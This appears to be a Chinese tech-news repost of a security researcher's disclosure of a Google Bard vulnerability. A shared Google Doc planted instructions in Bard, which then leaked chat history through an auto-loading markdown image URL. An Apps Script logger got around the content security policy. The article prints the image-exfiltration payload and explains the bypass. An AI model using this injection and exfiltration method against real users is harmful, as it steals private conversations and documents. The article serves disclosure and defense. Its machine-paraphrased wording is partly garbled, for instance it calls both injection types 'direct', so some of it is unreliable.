googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

操控 Bard 的秘密：运用一种叫提醒注入（Prompt Injection）的技术，黑客可以只使用自然语言破解人工智能系统。大型语言模型在生成文本时非常依赖提醒词。这种打击技术对于通过提醒词学习模型而言可谓是「以彼之矛，攻己之盾」，是最强长项，同时也是难以防范的软肋。提醒词分为系统指令和用户给出的指令，在自然语言中，这两者难以区分。如果用户有意在输入提醒词时，模仿系统指令，那么模型可能在对话里透露一些只有它才知道的「秘密」。提醒注入打击有多种形式，主要为直接提醒注入和直接提醒注入。直接提醒注入指用户直接向模型输入

操控 Bard 的秘密：运用一种叫提醒注入（Prompt Injection）的技术，黑客可以只使用自然语言破解人工智能系统。

大型语言模型在生成文本时非常依赖提醒词。这种打击技术对于通过提醒词学习模型而言可谓是「以彼之矛，攻己之盾」，是最强长项，同时也是难以防范的软肋。

提醒词分为系统指令和用户给出的指令，在自然语言中，这两者难以区分。如果用户有意在输入提醒词时，模仿系统指令，那么模型可能在对话里透露一些只有它才知道的「秘密」。

提醒注入打击有多种形式，主要为直接提醒注入和直接提醒注入。直接提醒注入指用户直接向模型输入恶念指令，试图引发意外或有害的行为。直接提醒注入指打击者将恶念指令注入到可能被模型检索或摄入的文档中，从而直接地控制或引导模型。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

有网友使用「系统指令」引导 GPT 揭发数据

最近，google Bard 迎来了一波强大的更新，Bard 增加了拓展功能，支持走访 YouTube，搜索航班和酒店，还能查阅用户的个人文件和邮件。

除此之外，Bard 可以连接到「google全家桶」，走访你的google云盘、文档和邮件！但这同时意味着 Bard 将分析不受信任的数据，容易受直接提醒注入的影响。也就是说，不怀好意的人可能通过向你发送电子邮件或强行分享google文档进行直接的提醒注入打击，因为对方发什么样的邮件、文档给你，你是控制不了的，但 Bard 却会无差别走访。

在安全风险分析领域有着 20 年经验的前微软 Azure 安全工程师 Johann Rehberger 体验了 Bard 的全新版本，并尝试了被提醒注入打击时，Bard 的数据泄漏风险。

原博客链接：https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

Johann 首先快速验证了提醒注入的可行性。他通过让 Bard 分析旧的 YouTube 视频，并使用google文档进行尝试尝试结果显示，Bard 确实按照他的额外提醒进行了操作，这证明了接下来要进行的尝试的可行性。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

Bard 的破绽：图象 Markdown 注入

在得知 Bard 可以被提醒注入后，Johann 开始了进一步的研究。

LLM 应用中的一个常见破绽是通过衬着超链接和图象来揭发聊天历史记录。问题是，这如何适用于google Bard？

当google的大模型返回文本时，它可以返回 markdown 元素，Bard 将其呈现为 HTML! 这包括衬着图象的功能。

想象一下google的大模型返回这样的文本：

![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])

这将呈现为 HTML 图象标记，其 src 属性指向 attacker 服务器。

<img src="https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION]">

浏览器会自动连接到 URL，无需用户交互即可加载图片。借助 LLM 的强大功能，我们可以在聊天上下文中总结或走访以前的数据，并将其相应地附加到 URL 中。

在编写破绽利用程序时，Johann 很快就开发出了一个提醒注入有效载荷，它可以读取对话的历史记录，并形成一个包含该历史记录的超链接。然而，google的内容安全策略（CSP）阻止了图象的衬着。这对打击者来说是一个难题。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

绕过内容安全策略

要从打击者控制的服务器衬着图片，并不容易。google的内容安全策略阻止从任意源加载图片。CSP 包含诸如 *.google.com 和 *.googleusercontent.com 之类的源，相当广泛。这意味着应该能找到一种绕过方法。

研究后，Johann 得知了 Google Apps Script，这或许可以绕过 CSP 。

Apps Scripts 类似于 Office 里的宏，可以通过 URL 调用，并在 script.google.com（或 googleusercontent.com）域上运行。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

如此一来，Bard Logger 可以在 Apps Script 中完成了。这个 Logger 将所有附加到调用 URL 的查询参数写入一个 Google Doc，而它正是外泄的目的地。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

起初，Johann 以为这个方法并不可行，但他发现点击了几下 Apps Script 用户界面后，他找到了一个无需验证的设置。

接下来，一切准备工作就绪：

确认了google Bard 易受通过扩展程序数据直接注入提醒的影响

google Bard 有允许零点击衬着图片的破绽

一个写有提醒注入指令的恶念google文档

一个位于 google.com 上的日志端点，用于在图象加载时接收数据。

揭发过程

Johann 提供了他让 Bard 揭发数据的全过程。

原视频链接：https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

首先，和 Bard 先聊一些日常：

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

用户走访一个google文档（The Bard2000），这导致打击者指令注入和图象衬着。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

打击者通过 Apps Script 中的脚本将数据接收到google文档。

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

以下是 Johann 用于「提醒注入」的google文档：

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

google的修复

这个安全问题已经于 2023 年 9 月 19 日报告给 Google VRP。

10 月 19 日，Johann 想要在 Ekoparty 2023 中进行演示，所以询问了关于这个破绽的情况。Google 确认已经修复。目前还不太清楚google采取了何种修复措施。但 CSP 没有修改，仍然可以衬着图象。因此，这可能是已经采取了一些过滤措施，以防止将数据插入到 URL 中。

参考链接：

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

{{userData.name}}已认证

googleBard「破防」，用自然语言破解，提醒注入引起数据泄漏风险

真正实现一步文生图，googleUFOGen极速采样，生成高质量图像

GPT-4V在主动驾驭上应用前景如何？面向真实场景的全面测评来了

刚刚，AI颠覆物理模拟：一句话精准仿真，学术圈半壁江山联手耗时24个月研究成果

历时2年，华人团队力作，震撼开源生成式物理引擎Genesis，可模拟世界万物

细节表现超Sora，网友：真正的国产之光！MiniMax视频模型再上新

2024年AI 编程现在可以做到什么程度？

超越所有SOTA！最新UniScene：视频点云Occ三大生成任务全部暴力提升~

腾讯基于 RAG 和 Agent 技术的混元大模型业务落地实践

抢跑OpenAI！谷歌Gemini 2.0震撼登场：全面转向Agent，多模态输入输出，免费随便玩

实测来了！Kimi发布k1视觉思考模型，实力颠覆K12教育赛道，涌现能力强得可怕，免费可用！网友：国产之光！